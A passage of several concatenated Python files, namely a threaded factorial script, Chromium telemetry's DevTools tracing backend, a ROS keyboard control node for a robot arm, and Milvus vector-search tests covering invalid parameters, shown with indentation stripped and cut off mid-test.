# process = int(input('Introduce la cantidad de hilos: '))
# n = 10000
n = int(input('Introduce el valor de n: '))
kmax = int(math.log(n)/math.log(5))
threads = []
for i in range(1, process+1):
threads.append(threading.Thread(target=calculate_factorial, args=(i, kmax+1, process, n)))
threads[-1].start()
for i in range(process):
threads[i].join()
print(sum(factorial_bunch))
|
tracing_backend.py
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import cStringIO
import json
import logging
import socket
import threading
from telemetry.core import util
from telemetry.core.chrome import trace_result
from telemetry.core.chrome import websocket
from telemetry.core.timeline import model
class TracingUnsupportedException(Exception):
pass
class TraceResultImpl(object):
def __init__(self, tracing_data):
self._tracing_data = tracing_data
def Serialize(self, f):
f.write('{"traceEvents": [')
d = self._tracing_data
# Note: we're not using ','.join here because the strings that are in the
# tracing data are typically many megabytes in size. In the fast case, f is
# just a file, so by skipping the in memory step we keep our memory
# footprint low and avoid additional processing.
if len(d) == 0:
pass
elif len(d) == 1:
f.write(d[0])
else:
f.write(d[0])
for i in range(1, len(d)):
f.write(',')
f.write(d[i])
f.write(']}')
def AsTimelineModel(self):
f = cStringIO.StringIO()
self.Serialize(f)
return model.TimelineModel(event_data=f.getvalue())
class TracingBackend(object):
def __init__(self, devtools_port):
debugger_url = 'ws://localhost:%i/devtools/browser' % devtools_port
self._socket = websocket.create_connection(debugger_url)
self._next_request_id = 0
self._cur_socket_timeout = 0
self._thread = None
self._tracing_data = []
def BeginTracing(self, custom_categories=None):
self._CheckNotificationSupported()
req = {'method': 'Tracing.start'}
if custom_categories:
req['params'] = {'categories': custom_categories}
self._SyncRequest(req)
# Tracing.start will send asynchronous notifications containing trace
# data, until Tracing.end is called.
self._thread = threading.Thread(target=self._TracingReader)
self._thread.start()
def EndTracing(self):
req = {'method': 'Tracing.end'}
self._SyncRequest(req)
self._thread.join()
self._thread = None
def GetTraceResultAndReset(self):
assert not self._thread
ret = trace_result.TraceResult(
TraceResultImpl(self._tracing_data))
self._tracing_data = []
return ret
def Close(self):
if self._socket:
self._socket.close()
self._socket = None
def _TracingReader(self):
while self._socket:
try:
data = self._socket.recv()
if not data:
break
res = json.loads(data)
logging.debug('got [%s]', data)
if 'Tracing.dataCollected' == res.get('method'):
value = res.get('params', {}).get('value')
self._tracing_data.append(value)
elif 'Tracing.tracingComplete' == res.get('method'):
break
except (socket.error, websocket.WebSocketException):
logging.warning('Timeout waiting for tracing response, unusual.')
def _SyncRequest(self, req, timeout=10):
self._SetTimeout(timeout)
req['id'] = self._next_request_id
self._next_request_id += 1
data = json.dumps(req)
logging.debug('will send [%s]', data)
self._socket.send(data)
def _SetTimeout(self, timeout):
if self._cur_socket_timeout != timeout:
self._socket.settimeout(timeout)
self._cur_socket_timeout = timeout
def _CheckNotificationSupported(self):
"""Ensures we're running against a compatible version of chrome."""
req = {'method': 'Tracing.hasCompleted'}
self._SyncRequest(req)
while True:
try:
data = self._socket.recv()
except (socket.error, websocket.WebSocketException):
raise util.TimeoutException(
'Timed out waiting for reply. This is unusual.')
logging.debug('got [%s]', data)
res = json.loads(data)
if res['id'] != req['id']:
logging.debug('Dropped reply: %s', json.dumps(res))
continue
if res.get('response'):
raise TracingUnsupportedException(
'Tracing not supported for this browser')
elif 'error' in res:
return
|
key_control.py
|
#!/usr/bin/env python3
import sys, tty, termios
import threading
import rospy
from std_msgs.msg import Float64
# input variables
ch = ''
def read_input():
global ch
while True:
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
# interpretting input
if ch=='h':
show_help()
elif ch == 'x':
break
elif ch=='q':
cur_cmd[0] += 0.1
if cur_cmd[0] > 3.14:
cur_cmd[0] = 3.14
elif ch=='e':
cur_cmd[0] -= 0.1
if cur_cmd[0] < -3.14:
cur_cmd[0] = -3.14
elif ch=='d':
cur_cmd[1] -= 0.1
if cur_cmd[1] < -3.14:
cur_cmd[1] = -3.14
elif ch=='a':
cur_cmd[1] += 0.1
if cur_cmd[1] > 0.19:
cur_cmd[1] = 0.19
elif ch=='w':
cur_cmd[2] -= 0.1
if cur_cmd[2] < -2:
cur_cmd[2] = -2
elif ch=='s':
cur_cmd[2] += 0.1
if cur_cmd[2] > 1.5708:
cur_cmd[2] = 1.5708
elif ch=='p':
cur_cmd[3] += 0.001
if cur_cmd[3] > 0.055:
cur_cmd[3] = 0.055
elif ch=='o':
cur_cmd[3] -= 0.001
if cur_cmd[3] < 0:
cur_cmd[3] = 0
else:
print('\nInvalid input. Press h to see help.\n')
def show_help():
print('\nControl the human_arm using keyboard with following keys')
print('q - move body CCW')
print('e - move body CW')
print('d - move shoulder right')
print('a - move shoulder left')
print('w - move upper arm up')
print('s - move upper arm down')
print('p - close gripper')
print('o - open gripper')
print('h - to show this help')
print('x - to exit')
def send_cmds():
for i in range(0,4):
if prev_cmd[i] != cur_cmd[i]:
if i == 0:
body_pub.publish(cur_cmd[i])
elif i == 1:
shoulder_pub.publish(cur_cmd[i])
elif i == 2:
upper_arm_pub.publish(cur_cmd[i])
elif i == 3:
gripper_pub.publish(cur_cmd[i])
prev_cmd[i] = cur_cmd[i]
#print(cur_cmd)
rate.sleep()
if __name__ == '__main__':
# Control variables
prev_cmd = [0,0,0,0] # 0 - body | 1 - shoulder | 2 - upper arm | 3 - gripper
cur_cmd = [0,0,0,0]
# initialize the node
rospy.init_node('human_arm_key_control', anonymous=False)
# define publishers
body_pub = rospy.Publisher('/human_arm/body_joint_controller/command', Float64, queue_size=1000)
shoulder_pub = rospy.Publisher('/human_arm/shoulder_move_1_joint_controller/command', Float64, queue_size=1000)
upper_arm_pub = rospy.Publisher('/human_arm/upper_arm_joint_controller/command', Float64, queue_size=1000)
gripper_pub = rospy.Publisher('/human_arm/gripper_finger_joint_controller/command', Float64, queue_size=1000)
# background daemon thread to take user input
th_user_input = threading.Thread(target=read_input)
th_user_input.daemon = True
th_user_input.start()
rate = rospy.Rate(8)
try:
show_help()
while not (rospy.is_shutdown() or ch=='x'):
send_cmds()
except rospy.ROSInterruptException:
pass
finally:
print('Ended human_arm key_control.')
|
test_search_20.py
|
import threading
import time
import pytest
import random
import numpy as np
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "search_collection"
search_num = 10
max_dim = ct.max_dim
epsilon = ct.epsilon
gracefulTime = ct.gracefulTime
default_nb = ct.default_nb
default_nb_medium = ct.default_nb_medium
default_nq = ct.default_nq
default_dim = ct.default_dim
default_limit = ct.default_limit
default_search_exp = "int64 >= 0"
default_search_field = ct.default_float_vec_field_name
default_search_params = ct.default_search_params
default_int64_field_name = ct.default_int64_field_name
default_float_field_name = ct.default_float_field_name
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
class TestCollectionSearchInvalid(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function", params=ct.get_invalid_vectors)
def get_invalid_vectors(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for field")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_value(self, request):
if not isinstance(request.param, str):
pytest.skip("field value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_type(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_ints)
def get_invalid_limit(self, request):
if isinstance(request.param, int) and request.param >= 0:
pytest.skip("positive int is valid type for limit")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for expr")
if request.param == None:
pytest.skip("None is valid for expr")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_value(self, request):
if not isinstance(request.param, str):
pytest.skip("expression value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_partition(self, request):
if request.param == []:
pytest.skip("empty is valid for partition")
if request.param == None:
pytest.skip("None is valid for partition")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_output_fields(self, request):
if request.param == []:
pytest.skip("empty is valid for output_fields")
if request.param == None:
pytest.skip("None is valid for output_fields")
yield request.param
"""
******************************************************************
# The followings are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_connection(self):
"""
target: test search without connection
method: create and delete connection, then search
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. remove connection
log.info("test_search_no_connection: removing connection")
self.connection_wrap.remove_connection(alias='default')
log.info("test_search_no_connection: removed connection")
# 3. search without connection
log.info("test_search_no_connection: searching without connection")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "should create connect first"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_collection(self):
"""
target: test the scenario which search the non-exist collection
method: 1. create collection
2. drop collection
3. search the dropped collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. Drop collection
collection_w.drop()
# 3. Search without collection
log.info("test_search_no_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s doesn't exist!" % collection_w.name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_missing(self):
"""
target: test search with incomplete parameters
method: search with incomplete parameters
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection with missing parameters
log.info("test_search_param_missing: Searching collection %s "
"with missing parameters" % collection_w.name)
try:
collection_w.search()
except TypeError as e:
assert "missing 4 required positional arguments: 'data', " \
"'anns_field', 'param', and 'limit'" in str(e)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_vectors(self, get_invalid_vectors):
"""
target: test search with invalid parameter values
method: search with invalid data
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_vectors = get_invalid_vectors
log.info("test_search_param_invalid_vectors: searching with "
"invalid vectors: {}".format(invalid_vectors))
collection_w.search(invalid_vectors, default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`search_data` value {} is illegal".format(invalid_vectors)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_dim(self):
"""
target: test search with invalid parameter values
method: search with invalid dim
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid dim
log.info("test_search_param_invalid_dim: searching with invalid dim")
wrong_dim = 129
vectors = [[random.random() for _ in range(wrong_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The dimension of query entities "
"is different from schema"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_type(self, get_invalid_fields_type):
"""
target: test search with invalid parameter type
method: search with invalid field
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_type
log.info("test_search_param_invalid_field_type: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items=
{"err_code": 1,
"err_msg": "`anns_field` value {} is illegal".format(invalid_search_field)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_value(self, get_invalid_fields_value):
"""
target: test search with invalid parameter values
method: search with invalid field
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_value
log.info("test_search_param_invalid_field_value: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Field %s doesn't exist in schema"
% invalid_search_field})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_metric_type(self, get_invalid_metric_type):
"""
target: test search with invalid parameter values
method: search with invalid metric type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. search with invalid metric_type
log.info("test_search_param_invalid_metric_type: searching with invalid metric_type")
invalid_metric = get_invalid_metric_type
search_params = {"metric_type": invalid_metric, "params": {"nprobe": 10}}
collection_w.search(vectors[:default_nq], default_search_field, search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "metric type not found"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6727")
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_invalid_params_type(self, index, params):
"""
target: test search with invalid search params
method: test search with invalid params type
expected: raise exception and report the error
"""
if index == "FLAT":
pytest.skip("skip in FLAT index")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
is_index=True)
# 2. create index and load
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
invalid_search_params = cf.gen_invaild_search_params_type()
for invalid_search_param in invalid_search_params:
if index == invalid_search_param["index_type"]:
search_params = {"metric_type": "L2", "params": invalid_search_param["search_params"]}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 0,
"err_msg": "metric type not found"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_limit_type(self, get_invalid_limit):
"""
target: test search with invalid limit type
method: search with invalid limit
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_limit = get_invalid_limit
log.info("test_search_param_invalid_limit_type: searching with "
"invalid limit: %s" % invalid_limit)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
invalid_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`limit` value %s is illegal" % invalid_limit})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("limit", [0, 16385])
def test_search_param_invalid_limit_value(self, limit):
"""
target: test search with invalid limit value
method: search with invalid limit: 0 and maximum
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid limit (topK)
log.info("test_search_param_invalid_limit: searching with "
"invalid limit (topK) = %s" % limit)
err_msg = "limit %d is too large!" % limit
if limit == 0:
err_msg = "`limit` value 0 is illegal"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_type(self, get_invalid_expr_type):
"""
target: test search with invalid parameter type
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_type
log.info("test_search_param_invalid_expr_type: searching with "
"invalid expr: {}".format(invalid_search_expr))
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The type of expr must be string ,"
"but {} is given".format(type(invalid_search_expr))})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_value(self, get_invalid_expr_value):
"""
target: test search with invalid parameter values
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_value
log.info("test_search_param_invalid_expr_value: searching with "
"invalid expr: %s" % invalid_search_expr)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "invalid expression %s"
% invalid_search_expr})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_invalid_type(self, get_invalid_partition):
"""
target: test search invalid partition
method: search with invalid partition type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search the invalid partition
partition_name = get_invalid_partition
err_msg = "`partition_name_array` value {} is illegal".format(partition_name)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, partition_name,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_invalid_type(self, get_invalid_output_fields):
"""
target: test search with output fields
method: search with invalid output_field
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search
log.info("test_search_with_output_fields_invalid_type: Searching collection %s" % collection_w.name)
output_fields = get_invalid_output_fields
err_msg = "`output_fields` value {} is illegal".format(output_fields)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_release_collection(self):
"""
target: test the scenario which search the released collection
method: 1. create collection
2. release collection
3. search the released collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. release collection
collection_w.release()
# 3. Search the released collection
log.info("test_search_release_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s was not loaded "
"into memory" % collection_w.name})
@pytest.mark.tags(CaseLabel.L2)
def test_search_release_partition(self):
"""
target: test the scenario which search the released collection
method: 1. create collection
2. release partition
3. search with specifying the released partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 10, partition_num)[0]
par = collection_w.partitions
par_name = par[partition_num].name
# 2. release partition
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par_name])
# 3. Search the released partition
log.info("test_search_release_partition: Searching specifying the released partition")
limit = 10
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "partition has been released"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_collection(self):
"""
target: test search with empty connection
method: search the empty collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection without data before load
log.info("test_search_with_empty_collection: Searching empty collection %s"
% collection_w.name)
err_msg = "collection" + collection_w.name + "was not loaded into memory"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, timeout=1,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
# 3. search collection without data after load
collection_w.load()
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
@pytest.mark.tags(CaseLabel.L1)
def test_search_partition_deleted(self):
"""
target: test search deleted partition
method: 1. search the collection
2. delete a partition
3. search the deleted partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 1000, partition_num)[0]
# 2. delete partitions
log.info("test_search_partition_deleted: deleting a partition")
par = collection_w.partitions
deleted_par_name = par[partition_num].name
collection_w.drop_partition(deleted_par_name)
log.info("test_search_partition_deleted: deleted a partition")
collection_w.load()
# 3. search after delete partitions
log.info("test_search_partition_deleted: searching deleted partition")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
[deleted_par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % deleted_par_name})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6731")
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_different_index_invalid_params(self, nq, dim, index, params, auto_id, _async):
"""
target: test search with different index
method: test search with different index
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create different index
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim//4
log.info("test_search_different_index_invalid_params: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_different_index_invalid_params: Created index-%s" % index)
collection_w.load()
# 3. search
log.info("test_search_different_index_invalid_params: Searching after creating index-%s" % index)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_partition_not_existed(self):
"""
target: test search not existed partition
method: search with not existed partition
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search the non exist partition
partition_name = "search_non_exist"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, [partition_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % partition_name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_binary(self):
"""
target: test search within binary data (invalid parameter)
method: search with wrong metric type
expected: raise exception and report the error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
# 3. search with exception
binary_vectors = cf.gen_binary_vectors(3000, default_dim)[1]
wrong_search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector", wrong_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "unsupported"})
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self):
"""
target: search binary collection using FlAT with L2
method: search binary collection using FLAT with L2
expected: raise exception and report error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. search and assert
query_raw_vector, binary_vectors = cf.gen_binary_vectors(2, default_dim)
search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search failed"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_fields_not_exist(self):
"""
target: test search with output fields
method: search with non-exist output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search
log.info("test_search_with_output_fields_not_exist: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=["int63"],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: 'Field int63 not exist'})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("output_fields", [[default_search_field], ["%"]])
def test_search_output_field_vector(self, output_fields):
"""
target: test search with vector as output field
method: search with one vector output_field or
wildcard for vector
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search doesn't support "
"vector field as output_fields"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*%"], ["**"], ["*", "@"]])
def test_search_output_field_invalid_wildcard(self, output_fields):
"""
target: test search with invalid output wildcard
method: search with invalid output_field wildcard
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": f"Field {output_fields[-1]} not exist"})
class TestCollectionSearch(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function",
params=[default_nb, default_nb_medium])
def nb(self, request):
yield request.param
@pytest.fixture(scope="function", params=[2, 500])
def nq(self, request):
yield request.param
@pytest.fixture(scope="function", params=[8, 128])
def dim(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def auto_id(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def _async(self, request):
yield request.param
"""
******************************************************************
# The following are valid base cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_search_normal(self, nq, dim, auto_id):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)
# 2. search
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tag(CaseLabel.L0)
def test_search_with_hit_vectors(self, nq, dim, auto_id):
"""
target: test search with vectors in collections
method: create connections,collection insert and search vectors in collections
expected: search successfully with limit(topK) and can be hit at top 1 (min distance is 0)
"""
collection_w, _vectors, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)
# get vectors that inserted into collection
vectors = np.array(_vectors[0]).tolist()
vectors = [vectors[i][-1] for i in range(nq)]
search_res, _ = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
for hits in search_res:
# verify that top 1 hit is itself,so min distance is 0
assert hits.distances[0] == 0.0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_vectors(self, dim, auto_id, _async):
"""
target: test search with empty query vector
method: search using empty query vector
expected: search successfully with 0 results
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True,
auto_id=auto_id, dim=dim)[0]
# 2. search collection without data
log.info("test_search_with_empty_vectors: Searching collection %s "
"using empty vector" % collection_w.name)
collection_w.search([], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("search_params", [{}, {"params": {}}, {"params": {"nprobe": 10}}])
def test_search_normal_default_params(self, dim, auto_id, search_params, _async):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)
# 2. search
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_before_after_delete(self, nq, dim, auto_id, _async):
"""
target: test search function before and after deletion
method: 1. search the collection
2. delete a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_before_after_delete: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. delete partitions
log.info("test_search_before_after_delete: deleting a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
collection_w.drop_partition(par[partition_num].name)
log.info("test_search_before_after_delete: deleted a partition")
collection_w.load()
# 4. search non-deleted part after delete partitions
log.info("test_search_before_after_delete: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
